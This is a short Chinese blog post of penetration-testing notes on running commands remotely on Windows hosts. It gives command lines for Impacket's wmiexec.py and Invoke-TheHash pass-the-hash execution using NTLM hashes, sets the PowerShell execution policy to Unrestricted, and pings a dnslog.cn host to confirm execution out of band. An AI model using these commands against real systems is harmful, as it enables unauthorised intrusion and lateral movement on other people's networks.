zoukankan      html  css  js  c++  java
  • windows远程执行命令总结

    1. 利用Impacket

    Impacket是一个Python类库,用于对SMB1-3或IPv4 / IPv6 上的TCP、UDP、ICMP、IGMP,ARP,IPv4,IPv6,SMB,MSRPC,NTLM,Kerberos,WMI,LDAP等协议进行低级编程访问。 

    git clone https://github.com/CoreSecurity/impacket.git cd impacket/ python setup.py install

    cd impacket/example

     以WMIC 做演示:

    proxychains python wmiexec.py SERVER01/Administrator:password@10.x.x.x

    2.Invoke-TheHash-master

    Functions

    • Invoke-WMIExec
    • Invoke-SMBExec
    • Invoke-SMBEnum
    • Invoke-SMBClient
    • Invoke-TheHash

    Invoke-WMIExec

    • WMI command execution function.
    Example:

    Invoke-WMIExec -Target 192.168.100.20 -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Command "command or launcher to execute" -verbose

    Invoke-SMBExec

    • SMB (PsExec) command execution function supporting SMB1, SMB2.1, with and without SMB signing.
    Example:

    Invoke-SMBExec -Target 192.168.100.20 -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Command "command or launcher to execute" -verbose

    Example:

    Check SMB signing requirements on target. Invoke-SMBExec -Target 192.168.100.20

    Screenshot:

    复现:

    解决办法:

    Set-ExecutionPolicy -ExecutionPolicy UNRESTRICTED

    常用SMBEXec 做测试 

    Invoke-SMBExec -Target 10.x.190.8 -Username Administrator -Hash efd2aec67e96c7264873c255c08c872f -Command "ping xx.dnslog.cn -n 2"

    工具下载地址:https://github.com/Kevin-Robertson/Invoke-TheHash

  • 相关阅读:
    四、系统开发和运行知识(二)
    9.Parameters
    7.Constants and Fields
    四、系统开发和运行知识(一)
    三、操作系统知识(3)
    6.Type and Member Basics
    三、操作系统知识(2)
    5.Primitive, Reference, and Value Types
    4、Type fundamentals
    三、操作系统知识(1)
  • 原文地址:https://www.cnblogs.com/0xdd/p/12433885.html
Copyright © 2011-2022 走看看